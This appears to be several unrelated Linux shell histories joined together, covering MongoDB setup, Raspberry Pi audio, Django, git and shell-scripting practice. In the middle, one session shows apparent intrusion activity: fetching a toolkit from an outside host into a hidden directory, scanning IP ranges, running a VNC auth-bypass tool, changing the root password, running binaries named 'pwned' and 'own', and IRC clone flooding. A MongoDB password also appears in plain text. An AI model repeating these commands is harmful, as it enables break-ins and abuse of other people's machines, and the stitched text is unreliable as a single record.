mongodb status +sudo service mongodb status +sudo service mongodb start +sudo poweroff +service mongod start +ll +ll +find / -name mongod.service +sudo find / -name mongod.service +;s +ls +ls +ls +ls +ls +vim mongodb.service +sudo vim mongodb.service +service mongod start +rm -rf mongodb.service +sudo rm -rf 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update +sudo apt-get install -y mongodb-org +sudo service mongod start +sudo mongo +ls +vim mongod.conf +sudo vim mongod.conf +ls +ls +ls +ls +ls +ls +mongod +vim /etc/mongod.conf +;s +ls +ls +rm -rf mongod.lock +sudo rm -rf mongod.lock +vim /etc/mongod.conf +sudo mongod -f /etc/mongod.conf --fork +service mongod stop +sudo vim /etc/mongod.conf +touch mongod.service +vim mongod.service +whereis mongod +mognod +mongod +vim mongod.service +ls +sudo mv /home/wulai/mongod.service ./ +ls +sudo chmod 754 mongod.service +systemctl start mongod.service +ls +sudo rm -rf mongod.lock +sudo systemctl start mongod.service +systemctl status mongod.service +ls +sudo mongod -f /etc/mongod.conf +mongo +mongo localhost:28018 +ps aux | grep mongo +sudo mongod --shutdown +sudo mongod --shutdown --dbpath /var/lib/mongodb/ +mongo localhost:28018 +sudo mognod -f /etc/mongod.conf +sudo mongod -f /etc/mongod.conf +mongo localhost:28018 +ls +rm -rf mongod.lock +sudo rm -rf mongod.lock +sudo vim /etc/init.d/mongodb +sudo chmod +x /etc/init.d/mongodb +sudo service mongod start +systemctl status mongod.service +ls +sudo mv /usr/lib/systemd/ +ls +sudo service mongod status +ls +ls +ls +sudo vim /etc/rc.local +sudo service mongod start +ls +sudo find / -name "mongod.service" +sudo rm -rf /etc/systemd/system/mongod.service +vim /lib/systemd/system/mongod.service +vim /var/run/ +ls +sudo service mongod start +sudo journalctl -xe +ls +vim mongodb +sudo rm -rf mongodb +sudo vim /lib/systemd/system/mongod.service +sudo service mongod start +sudo systemctl status mongod.service +ls +touch mongod +sudo touch mongod +sudo service mongod status +sudo service mongod start +sudo apt-get purge mongodb-org* +sudo rm -rf /var/log/mongodb/ +sudo rm -rf /var/lib/mongodb/ +ls +mongod +ls +sudo rm -rf mongod +ls +ls m* +sudo apt-get install -y mongodb-org +sudo service mongod start +ls +ls mon* +sudo vim mongod.service +sudo systemctl unmask mongodb +sudo service mongod start +sudo service mongod status +sudo vim /etc/mongod.conf +sudo systemctl enable mongod +reboot +sudo reboot +sudo service mongod stauts +sudo service mongod status +mongo localhost:28018 +mongo localhost:28018 -u "wulai" -p "renlei281034" --authenticationDatabase "admin" +mongo +mongo localhost:28018 +vim /etc/mongod.conf +mongo localhost:28018 +mongo localhost:28018 -u "wulai" -p "renlei281034" +mongo localhost:28018 -u "wulai" -p "renlei281034" --authentication +mongo localhost:28018 -u "wulai" -p "renlei281034" --authenticationDatabase admin +mongo localhost:28018 +mongo localhost:28018 -u "wulai" -p "renlei281034" --authenticationDatabase admin +mongo localhost:28018 +mongo localhost:28018 -u "wulai" -p "renlei281034" --authenticationDatabase admin +sudo vim /etc/mongod.conf +mongo localhost:28018 +sudo vim /etc/mongod.conf +sudo service mongod restart +sudo service mongod status +ls +rm -rf mongod.lock +sudo rm -rf mongod.lock +sudo service mongod start +sudo service mongod status +sudo vim /etc/mongod.conf +sudo service mongod start +sudo service mongod status +sudo vim /etc/mongod.conf +sudo service mongod start +sudo service mongod status +sudo service mongod restart +sudo service mongod status +sudo vim /etc/mongod.conf +sudo mongod /etc/mongod.conf +mongod --auth -f /etc/mongod.conf +sudo mongod --auth -f /etc/mongod.conf +ls +sudo rm -rf mongod.lock +sudo service mongod start +sudo service mongod status +sudo vim /etc/mongod.conf +sudo service mongod start +sudo service mongod status +ls +rm -rf mongod.lock +sudo rm -rf mongod.lock +sudo service mongod start +sudo service mongod status +ls +sudo vim /etc/mongod.conf +ls +sudo service mongod start +sudo service mongod status +ls +sudo systemctl unmask mongod +sudo service mongod start +sudo service mongod status +ls +sudo mongod -f /etc/mongod.conf +sudo vim /etc/mongod.conf +sudo service mongod start +sudo service mongod status +ls +rm -rf mongod.lock +sudo rm -rf mongod.lock +sudo mongod -f /etc/mongod.conf +ls +sudo rm -rf mongod.lock +sudo vim /etc/mongod.conf +sudo service mongod start +sudo service mongod status +ls +sudo rm -rf mongod.lock +sudo mongod -f /etc/mongod.conf +ls +ls +vim mongod.log +sudo vim mongod.log +sudo service mongod start +sudo service mongod status +sudo vim mongod.log +sudo service mongod status +vim /etc/mongod.conf +sudo mongod --remove +sudo mongod -h +ls +ls +ls +ls +ls +sudo rm -rf mongod.lock +sudo cd diagnostic.data/ +su +sudo apt purge mongodb-org* +ls +ls +sudo service mongod start +sudo systemctl unmask mongod +sudo service mongod start +su +exit +mongo --port=28018 -u "wulai" -p authenticationDatabase admin +mongo --port=28018 -u "wulai" -p --authenticationDatabase admin +mongo --port -u "wulai" -p --authentication admin +mongo --port=28018 -u "wulai" -p --authentication admin +mongo --port=28018 -u "wulai" -p --authenticationDatabase admin +exit +mysql -uroot -p +ls +ls +./idle.desk[B +su +ls +vi ocr_pi.png +ls +exit +whoami +uname +lsb_release +uname -r +uname -mrs +lsb_release +ls +vi *release +ls +clear +sudo nano /etc/network/interfaces +ls +cp interfaces interfaces.bak +sudo cp interfaces interfaces.bak +ls +sudo nano /etc/network/interfaces +ping www.google.com +ping +exit +sudo shutdown -h now +ping google.com +ping google.com -c 1 +startx +ls +ls +cp interfaces interfaces.wifi +sudo cp interfaces interfaces.wifi +cp interfaces.bak interfaces +sudo cp interfaces.bak interfaces +startx +sudo shutdown -r now +startx +ping google.com +ping +ping www.google.com +ping google.com +startx +sudo nano /etc/network/interfaces +ls +rm interfaces +sudo cp interfaces.wifi interfaces +nano interfaces +sudo nano interfaces +ls +ping google.com +startx +shutdown -r now +sudo shutdown -r now +startx +wifi +ls +sudo cp interfaces.bak interfaces +vi interfaces +ls +sudo shutdown -r now +startx +ping google.com +gstreamer +lsmod +amixer +amixer cset numid=3 1 +gpio +man gpio +sudo gpio +sudo apt-get -y install mpg321 +wgetspecialeffects.co.uk/soundfx/household/bubbling_water.mp3 +wgets.last.fm/167591395/Periphescence.mp3 +wgets.last.fm/167591395/Periphescence.mp3 +ls +mpg321 -g 50 Periphescence.mp3 +mpg321 -g 100 Periphescence.mp3 +sudo raspi-config +ls +sudo raspi-config +sudo shutdown -r now +ls +ping google.com +startx +sudo shutdown -r now +ls +startx +ls +mpg321 test.mp3 +ls -lart +sudo chmod 777 test.mp3 +ls +mpg321 test.mp3 +mpg321 -v test.mp3 +cmus +omxplayer +omxplayer -v +omxplayer test.mp3 +omxplayer -verbose test.mp3 +omxplayer -o local test.mp3 +ls +ls -lart +ls +ls +vi cmus-tutorial.txt +ls +ls +ls +./install +vi install +cmus +ls +ls +ls +ls +ls +sudo chmod 777 * +ls +./checks.sh +vi checks.sh +ls +lsmod +sudo modprobe snd_bcm2835 +lsmod +aplay +mpg321 test.mp3 +omxplayer test.mp3 +ls +sudo setenforce 0 +vi selinux/ +ls +sudo vi semanage.conf +ls +clear +ls +startx +omxplayer test.mp3 +omxplayer Periphescence.mp3 +mpg321 Periphescence.mp3 +startx +wget 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+kls +ls +rm -rf leet leet.tgz +exit +id +uptime +uname -a +ps x +chmod +x yudi +./yudi +ls +uname -a +who +exit +mkdir .x +wgetsmail.org/.g/webmin.tgz +tar zxvf webmin.tgz +rm webmin.tgz +mv webmin v +./scan 194.251 +./scan 62.93 +./scan 66.252 +./scan 88.208 +./scan 84.244 +exit +/VNC_bypauth -p 5900 -i -vnc -s 2500 +./VNC_bypauth -p 5900 -i -vnc -s 2500 +./VN +ls +exit +ls +w +w +finger +./VNC_bypauth -p 5900 -i -vnc -s 2500 +./VNC_bypauth -p 5900 -i -vnc -s 2500 +ls +vi s4.sh +gcc s4.sh +./a. +rm -rf s4.sh +nano s.sh +gcc s.sh +ls +rm -rf s.sh +rm -rf 05172006-VNC_bypauth-linux.tar.gz +cat VNC_bypauth.txt +rm -rf VNC_bypauth +sh +ls +w +finger +who +passwd root +whoami +su root +su +whereis su +/bin/su +ls +who +passwd root +ls +pwd +ls +ls +w +ls -a +ls -a +alias ls="ls --color=auto -pa" +ls +ls +ls +./s +ls +ls +./pwned +./own +./aVe +ls +./a.out +cp a.out ~ +~/a.out +cp -R locale ~ +ls +ls +./aVe +ls +./pwned +ls +id +ls +./own +./w00t +./h2 +cat /etc/issue +ls +./pwned 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+nano clones.txt +chmod +x clones.txt +./clones.txt +pico ips.txt +nano ips.txt +chmod +x clones.txt +./clones.txt +./clones.txt ips.txt +./clone.txt ips.txt 6667 rand turboshells huxor +./clones.txt ips.txt 6667 rand turboshells huxor +rm -rf clones.txt +wget +./cl +chmod +x clone.txt +./clone.txt +./clone.txt ips.txt 6667 rand turboshells huxor +os x +ps x +wget +rm -rf ips.txt +mv ips.txt.1 ips.txt +./clone.txt ips.txt 6667 rand turboshells huxor +./clone.txt +./clone.txt ips.txt 6667 nick-prefix turboshells huxor +exit +ps x +ls +pico ips.txt +nano ips.txt +mkdir .x +mkdir .m +mv ips.txt .m +ls +pico clone.txt +nano clone.txt +perl clone.txt +mv ips.txt / +mv ips.txt /home/toor +l +ls +perl clone.txt ips.txt 6667 xteam/122 zblojencek +perl clone.txt ips.txt 6667 xteam/122 #ranakah zblojencek +perl clone.txt ips.txt 6667 deklca #ranakah zblojencek +perl clone.txt ips.txt 6667 deklca/rand #ranakah zblojencek +perl clone.txt ips.txt 6667 rand #ranakah zblojencek +pico clone.txt +nano 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+lss +ls +ls +ls +cp default.settings.php settings.php +chmod a+w settings.php +ls +mv index.html _index.html +apt-cache search php +sudo apt-get install php +apt-cache search PHP +apt-cache search PHP|less +apt-cache search lamp +apt-cache search php5 +apt-cache search php5-mysql +sudo apt-get install apache2 php5-mysql libapache2-mod-php5 +sudo /etc/apache2 restart +sudo /etc/init.d/apache2 restart +sudo /etc/init.d/mysql restart +less /etc/php5/apache2/php.ini +sudo emacs -nw /etc/php5/apache2/php.ini +clear +sudo /etc/init.d/apache2 restart +ls +sudo emacs -nw /etc/php5/apache2/php.ini +sudo reboot +ls +uptime +emacs -nw /etc/apache2/http.conf +less /etc/apache2/httpd.conf + +emacs -nw /etc/apache2/httpd.conf +sudo find / -name http.conf +sudo apt-get install libapache2-mod-php5 +sudo apt-get install libapache2-mod-php5 -f +sudo a2enmod php5 +sudo /etc/init.d/apache2 restart +ls +ls +mkdir files +chmod a+w files +/etc/init.d/mysql start +sudo /etc/init.d/mysql start +ls +chmod a-w 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apt-get install bazaar +apt-cache search bazaar +sudo apt-get install bzr +bzr help +sudo apt-get autoremove +info bzr +ls +mkdir bzrtest +touch testdoc.txt +bzr init +bzr add . +bzr status +bzr sign-all-commits +bzr commit +ls +info bzr +info bzr +bzr cat 2 +ls +lsa +bzr cat +bzr cat testdoc.txt +fg +bzr cat 2 testdoc.txt +fg +bzr info +fg +bzr push lp:~williams-jayson/+junk/bzrtest +bzr push lp:~williams-jayson/+junk/bzrtest +ls +lsa +mkdir bzr-linux-pers +bzr init +bzr add ../.bashrc +cp ../.bash* ./ +lsa +rm *~ +ls +ls +lsa +rm .*~ +lsa +bzr add . +bzr status +ls +ls +lsa +rm .bzr +rm -r .bzr +mkdir bash +mv .* ./bash +ls +lsa +lsa +bzr init +bzr add . +ls +lsa +rm -r .bzr +ls +bzr init +bzr add . +bzr commit -m 'initial .bash import' +bzr push lp:~williams-jayson/+junk/bashprefs +bzr push lp:~williams-jayson/+junk/bashprefs +bzr -v push lp:~williams-jayson/+junk/bashprefs +bzr push lp:~williams-jayson/+junk/bashprefs +bg +bzr help push +jobs +fg +fg +bzr push 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sftp://williams-jayson@bazaar.launchpad.net/~williams.jayson/bashpref +info bzr +bzr push --port443 sftp://williams-jayson@bazaar.launchpad.net/~williams.jayson/bashpref +bzr push --port 443 sftp://williams-jayson@bazaar.launchpad.net/~williams.jayson/bashpref +info bzr +jobs +cat ~/currentip_file.txt +bzr push lp:~williams-jayson/+junk/bashprefs +info bzr +bzr push lp:~williams-jayson/+junk/bashprefs --use-existing-dir +bzr push sftp://williams-jayson@bazaar.launchpad.net/~williams.jayson/bashpref/bashpref +bzr push sftp://williams-jayson@bazaar.launchpad.net/~williams.jayson/bashpref/bashpreffdjkaf;jsdkla;fs +bzr push sftp://hjasdfsfwilliams-jayson@bazaar.launchpad.net/~williams.jayson/bashpref/bashpref +bzr push sftp://williams-jayson@code.launchpad.net/~williams.jayson/bashpref/bashpref +bzr push ssh://williams-jayson@bazaar.launchpad.net/~williams.jayson/bashpref/bashpref +bzr push bzr+ssh://williams-jayson@bazaar.launchpad.net/~williams.jayson/bashpref/bashpref +info bzr +bzr push ssh://williams-jayson@bazaar.launchpad.net/~williams.jayson/bashpref/bashpref +bzr push sftp://williams-jayson@code.launchpad.net/~williams-jayson/bashpref/ +bzr push lp:~williams-jayson/+junk/bashprefs +sudo /etc/init.d/kdm stop +fdsajklkflsa +vesafb +info fb +menuconfig +hwinfo --framebuffer +sudo apt-get install hwinfo +hwinfo --framebuffer +to[;  +top +info hwinfo +hwinfo --bluetooth +hwinfo --all +sudo emacs -nw /etc/default/grub +sudo find / -name grub* +info grub +cat /usr/share/grub +ls +man grub +cat /boot/grub/menu.lst +man grub +info grub +info grub2 +uptime +top +sudo /etc/init.d/kdm start +sudo dpkg-reconfigure console-setup +sudo aticonfig +sudo cp /boot/grub/meun.lst /boot/grub/menu.lst~ +cp /boot/grub/menu.lst /boot/grub/menu.lst_ +sudo cp /boot/grub/menu.lst /boot/grub/menu.lst_ +sudo emacs -nw /boot/grub/menu.lst +setupcon +setupcon +lss +cat /boot/grub/menu.lst|less +sudo reboot +sudo emacs /boot/grub/menu.lst +sudo reboot +emacs /boot/grub/menu.lst +sudo emacs /boot/grub/menu.lst +sudo reboot +sudo emacs -nw /boot/grub/menu.lst +sudo reboot +sudo emacs /boot/grub/menu.lst +sudo reboot +sudo emacs /boot/grub/menu.lst +sudo reboot +sudo emacs /boot/grub/menu.lst +sudo reboot +sudo emacs /boot/grub/menu.lst +sudo reboot +sudo emacs /boot/grub/menu.lst +sudo reboot +sudo emacs /boot/grub/menu.lst +sudo reboot +sudo emacs /boot/grub/menu.lst +sudo reboot +ls +sudo /etc/init.d/kdm stop +info stop +uptime +sudo initctl samba stop +sudo initctrl stop samba +initctl stop samba +10l29i38f47e +initctl --help +initctl --dest=samba stop +sudo /etc/init.d/samba stop +sudo /etc/init.d/smbd stop +sudo apt-get remove samba +top +sudo kill 1444 +top +killall Xorg +sudo kill Xorg +sudo killall Xorg +top +sudo modprobe -r pcspkr +set bell-style=none +set bell-style none +sudo reboot +sudo emacs -nw /etc/modprobe.d/blacklist.conf +aumix +aumix +aumix +iw dev +iw wlp8s0 +sudo su +apt-get install -f +sudo su +wget -qO -sublimetext.com/sublimehq-pub.gpg | sudo apt-key add - +echo "debsublimetext.com/ apt/stable/" | sudo tee /etc/apt/sources.list.d/sublime-text.list +sudo apt-get update +wget -qO -sublimetext.com/sublimehq-pub.gpg | sudo apt-key add - +echo "debsublimetext.com/ apt/stable/" | sudo tee /etc/apt/sources.list.d/sublime-text.list +sudo apt-get update +sudo apt-get install sublime-text +sudo apt-get install python3 +python3 -m venv myvenv +sudo apt install python3-venv +python3 -m venv myvenv +source myvenv/bin/activate +python3 -m pip install --upgrade pip +pip install -r requirements.txt +python -m pip install -U --force-reinstall pip +pip install -r requirements.txt +sudo pip install -r requirements.txt +python -m pip install -U --force-reinstall pip +python3 -m pip install -U --force-reinstall pip +python -m pip install -U --force-reinstall pip +pip +sudo apt install python-pip +sudo pip install -r requirements.txt +python -m pip install -U --force-reinstall pip +sudo pip install -r requirements.txt +source myvenv/bin/activate +. myvenv/bin/activate +. djangovenv/myvenv/bin/activate +pip install -r requirements.txt +python -m pip install -U --force-reinstall pip +pip install -r requirements.txt +django-admin startproject mysite . +sudo apt install python-django-common +django-admin startproject mysite . +pip install -r requirements.txt +django-admin startproject mysite . +sudo apt-get update +sudo apt-get install python-django +django-admin --version +django-admin startproject mysite . +python manage.py migrate +python manage.py migrate +sudo apt-get upgrade +python manage.py migrate +python manage.py migrate +. myvenv/bin/activate +python manage.py migrate +python mysite/manage.py migrate +python manage.py migrate +python manage.py runserver +python manage.py startapp blog +python manage.py makemigrations blog +python manage.py migrate blog +python manage.py runserver +python manage.py createsuperuser +python manage.py runserver +python apt-get update +sudo python apt-get update +cls +clear +sudo python apt-get update +sudo apt-get update +python manage.py runserver +python manage.py runserver +sudo apt install adobe-flashplugin +sudo apt-get install flashplugin-installer +sudo apt-get upgrade +. myvenv/bin/activate +python manage.py runserver +clear +pythin +python +sudo python apt-get upgrade +pytnon3 -m venv env +pytnon -m venv env +clear +sudo add-apt-repository ppa:jonathonf/python-3.6 +python --version +sudo apt-get update +sudo apt-get install python3.6.1 +sudo apt-get install python3.6 +python --version +sudo apt-get update +pip freeze requirements.txt +python3 -m venv myvenv +python --version +python3 -V +pip install -r reuirements.txt +pip install -r reuirements.txt +pip install -r requirements.txt +python --version +sudo apt-get install python3.6 +sudo update-alternatives --config python3 +clear +python --version +sudo apt install python3 +python3 --version +update-alternatives --list python3 +sudo update-alternatives --config python3 +update-alternatives --list python +clear +python3 -m venv myvenv +source myvenv/bin/activate +python3 -m pip install --upgrade pip +pip install -r requirements.txt +django-admin startproject mysite . +python manage.py migrate +python manage.py runserver +python manage.py startapp blog +python manage.py makemigrations blog +python manage.py migrate blog +python manage.py createsuperuser +python manage.py runserver +ls +passwd +ls +w +uname +passwd +ls +ls +ls -l +exit +ks +ls +ps x +ls +ps +wgetsuarios.lycos.es/billi1981/psybnc-precopilada.tar +tar zxvf psybnc-precopilada.tar +gzip psybnc-precopilada.tar +ls +tar zxvf psybnc-precopilada.tar +ls +wgetsuarios.lycos.es/billi1981/psybnc-precopilada.tar +ls +tar zxvf psybnc-precopilada.tar.gz +ls +ps -fea +ls +ls +vi psybnc.conf +chmod 777 psybnc +./psybnc +ls +ps -fea +kill -9 1121 +ls +kill -9 8975 +kill -9 8637 +ls +rm -r psybnc-precopilada.tar.gz +ls +kill -9 psybnc-precopilada.tar +rm -r psybnc-precopilada.tar +ls +rm -r psybnc +wgets/download/psyBNC-2.3.2-7.tar.gz +tar zxvf psyBNC-2.3.2-7.tar.gz +make +ls +vi psybnc.conf +mkdir +firtsrepo +mkdir iotweek1 +ls +vd iotweek1 +git init firstrepo +ls +git status +touch readme.md +git add readme.md +git status +git commit -m "Add Readme file" +git remote add originsrepo.git +git push -u origin master +git push -u origin master +git push -u origin master +git init firstrepo +ls +iotweek1 +ls +git push _u origin master +git remote add originstrepo.git +git add README.md +ls +git init +git add Readme.md +echo "# firstrepo" >> README.md +git init +git add README.md +git commit -m "first commit" +git remote add originstrepo.git +git push -u origin master +git push -u origin master +git push -u origin master +git push -u origin master +mkdir iotweek2 +git clone git clonesligo/GoogleData +git clonesligo/GoogleData +echo "# iotweek3" >> README.md +git init +git add README.md +git commit -m "first commit" +git remote add origin +git push -u origin master +git remote add origin +git push -u origin maste +git add iotweek3 +git remote add origin +git push -u origin master +python manage.py startapp clients +python manage.py createsuperuser +python manage.py migrate +python manage.py createsuperuser +python manage.py makemigrations clients +python manage.py migrate +python manage.py makemigrations clients +python manage.py migrate +python manage.py makemigrations clients +python manage.py migrate clients +python manage.py makemigrations clients +python manage.py migrate clients +python manage.py makemigrations clients +python manage.py migrate clients +dir +ls +python manage.py makemigrations shelter +python manage.py migrate shelter +npm publish +npm publish +ls +pwd +pwd +mkdir proyecto1.2 +ls +pwd +pwd +proyecto1.2 +man +man cd +man pwd +manpwd +history +touch vacio.txt +ls +ls -al +cat vacio.txt +history +rm vacio.txt +rm -- help +pwd +git init +ls -al +code +git status +git add historia1.txt +git status +git commit -m "Este es mi primer commit de este archivo" +cat historia1.txt +git status +git commit -m "Cambios de la historia para reflejar mi evolucion" +git add . +git status +git commit -m "Cambios de la historia para reflejar mi evolucion" +git log historia1.txt +git show historia1.txt +git add . +git commit -m "Agregue un parrafo mas para ver algo" +git add . +git commit -m +git add . +git commit -m +git commit -m "otro parafo" +git show +git log historia1.txt +git diff a0ab6540969f501236c6a8b71090d4cc24caeb47 b16bec1bfde6063b9573f4efa4b2f6fdbe16f1bc +git diff 17c290e1ccbd976b6ee89a6a1cafd42356bb45a6 c0782a7c0654b31c5c33878000a096acaeaff7c7 +git log historia1.txt +git reset c0782a7c0654b31c5c33878000a096acaeaff7c7 --hard +git status +ls +ls -al +git add . +git status +git status +git diff +git add . +git status +git commit -m "arranco mi proyecto real" +git status +git log +git add . +git commit -m "cambio de vida" +git add . +git commit -m "cambio de maestria" +git log +git log --stat +q +git checkout reset b16bec1bfde6063b9573f4efa4b2f6fdbe16f1 --hard +git checkout b16bec1bfde6063b9573f4efa4b2f6fdbe16f1bc +git checkout b16bec1bfde6063b9573f4efa4b2f6fdbe16f1bc historia1.txt +git status +git log +git checkout b16bec1bfde6063b9573f4efa4b2f6fdbe16f1bc historia1.txt +git status +git branch +git checkout +git checkout master +git status +git checkout b16bec1bfde6063b9573f4efa4b2f6fdbe16f1bc historia1.txt +git status +git checkout master historia1.txt +git add . +git commit -m "Reemplazo de una version por otra de la historia" +git log +git log --stat +who am i +clear +pwd +sudo yum update all +free -m +exit +clear +ll +ls +pwd +ll +sudo yum install tomcat8-webapps tomcat8-docs-webapp tomcat8-admin-webapps +sudo wgetst/tomcat/tomcat-8/v8.5.38/bin/apache-tomcat-8.5.38.tar.gz.sha512 +yum install httpd -y +sudo yum install httpd -y +systemctl status httpd +systemctl start httpd +sudo service httpd restart +sudo service httpd status +sudo yum install java* +clear +java -versioon +java -version +ls +sudo wgets.apache.org/dist/tomcat/tomcat-9/v9.0.14/bin/apache-tomcat-9.0.14.tar.gz +wgets.apache.org/dist/tomcat/tomcat-9/v9.0.14/bin/apache-tomcat-9.0.14.tar.gz +sudo yum install tomcat +sudo vi /usr/share/tomcat/conf/tomcat.conf +2~ +sudo yum install tomcat-webapps tomcat-admin-webapps +sudo yum install tomcat-docs-webapp tomcat-javadoc +sudo vi /usr/share/tomcat/conf/tomcat-users.xml +sudo systemctl start tomcat +sudo systemctl status tomcat +clean +clear +la +exit +vi +Mcedit +clear +mcedit +clear +nano +vi RafaelEspindolaVIM +mcedit rafaelespindolavim +mcedit RafaelEspindolaVIM +vi RafaelEspindolaVIM +cat RafaelEspindolaVIM +less RafaelEspindolaVIM +nano RafaelEspindolaNANO +cat RafaelEspindolaNANO +mcedit RafaelEspindolaMCEDIT +cat RafaelEspindolaMCEDIT +exit +cat RafaelEspindolaVIM +vi RafaelEspindolaVIM +cat RafaelEspindolaVIM +nona RafaelEspindolaNONA +exit +vim RafaelEspindolaVIM +$pathn +$path +$PATH +help +vim +vim RafaelEspindolaVIM +clear +$PATH +mkdir bin +vi primeiro +primeiro +ls +vi primeiro +chmod +x primeiro +ls -la +primeiro +vi primeiro +primeiro +df +clear +df +clear +vi primeiro +primeiro +ls -l +primeiro +clear +primeiro +df /dev/xvda1 +date +df +df /dev +clear +primeiro +vim primeiro +primeiro +vim primeiro +primeiro +clear +primeiro +vim primeiro +primeiro +vim primeiro +primeiro +vim primeiro +primeiro +clear +primeiro +vim primeiro +primeiro +vim primeiro +primeiro +vim primeiro +primeiro +vim primeiro +primeiro +clear +primeiro +vim primeiro +primeiro +vim primeiro +primeiro +vim primeiro +primeiro +vim primeiro +primeiro +vim primeiro +primeiro +vim primeiro +clear +primeiro +vim primeiro +primeiro +vim primeiro +primeiro +vim primeiro +primeiro +vim primeiro +primeiro +vim primeiro +primeiro +vim primeiro +primeiro +exit +ls +ls +primeiro +exit +VARIAVEL="estou sem ideias" +echo $VARIAVEL +echo $VARIAVEL $VARIAVEL +VARIAVEL = "estou sem ideias" +echo $VARIAVEL $VARIAVEL +vim primeiro +vim primeiro +.. +..cd +../ +. +../ +data=$date +$data +echo $date +HOJE=$(date) +echo $HOJE +echo "HOje : $HOJE" +echo "Hoje : $HOJE" +HOJE=`date` +echo "Hoje e: $HOJE" +unset HOJE +echo $HOJE +cat -n primeiro +cat -n primeiro +cat primeiro +cat -- primeiro +cat --5 primeiro +cat --number primeiro +cat -n primeiro +vim primeirp +vim primeiro +primeiro +vim primeiro +primeiro +vim primeiro +primeiro +vim primeiro +primeiro +vim primeiro +primeiro +vim primeiro +primeir +primeiro +vim primeiro +primeiro +vim primeiro +primeiro +man date +vim primeiro +clear +primeiro +exit +ls +primeiro +clear +vim trabalho0304 +vim resenha +vim trabalho0304 +trabalho0304 +chmod +x trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +clear +trabalho0304 +clear +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +clear +trabalho0304 +clear +trabalho0304 +./primeiro +vim trabalho0304 +./primeiro +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +cat trabalho0304 +cat -n trabalho0304 +vim trabalho0304 +trabalho0304 +cat -n trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +cat -n primeiro +vim trabalho0304 +man cat +vim trabalho0304 +clear +trabalho0304 +vim trabalho0304 +ls +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +vim trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +clear +trabalho0304 +clear +vim trabalho0304 +clear +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +rev +rev vamos fazer um teste +cat -n trabalho0304 +ls +pwd +trabalho0304 +vim trabalho0304 +trabalho0304 +d +vim trabalho0304 +d +trabalho0304 +vim trabalho0304 +vim resenha +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +man sed +vim trabalho0304 +sed 5d resenha +vim trabalho0304 +trabalho0304 +chmod 444 resenha +ls l +ls -l +trabalho0304 +chmod 777 resenha +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +cat -n resenha +cat trabalho0304 | sort +cat trabalho0304 | sort 10 +man cat +cat trabalho0304 | cut "echo" | sort +cat trabalho0304 | cut -d "echo" | sort +cat trabalho0304 | cut -d "echo" -f1 | sort +cat trabalho0304 | cut "echo" -f1 | sort +cat trabalho0304 | cut -f1 | sort +cat trabalho0304 | cut -f1 | sort +cat trabalho0304 | cut -d "." -f1 | sort +cat trabalho0304 | cut -d ":" -f1 | sort +cat trabalho0304 | cut -d "." -f1 | sort +cat trabalho0304 | cut -d ":" -f1 | sort +cut -d ":" -f1 | sort +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +exit +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +exit +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 [A +vim trabalho0304 +trabalho0304 [A +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +cat -n trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +cat -n trabalho0304 +exit +vim trabalho0304 +uniq trabalho0304 +man uniq +man cat +primeiro +resenha +vim resenha +cat resenha +cat -n resenha +exit +trabalho0304 +vim trabalho0304 +n1=6 +n2=7 +test "$n1" -gt "n2" && echo "maior" || echo "menor" +test "$n1" -gt "$n2" && echo "maior" || echo "menor" +n1=8 +test "$n1" -gt "$n2" && echo "maior" || echo "menor" +echo "Informe usurio:"; read user; +test "$user" = "Redes" && "User: $user" || echo "User: errado" +echo "Informe usurio:"; read user; +cat -n trabalho0304 +trabalho0304 +man cut +clear +test "$n1" -gt "$n2" && echo "maior" || echo "menor" +clear +echo "Informe usurio:"; read user; +vim trabalho0304 +uniq +vim exercicio0703 +uniq +vim 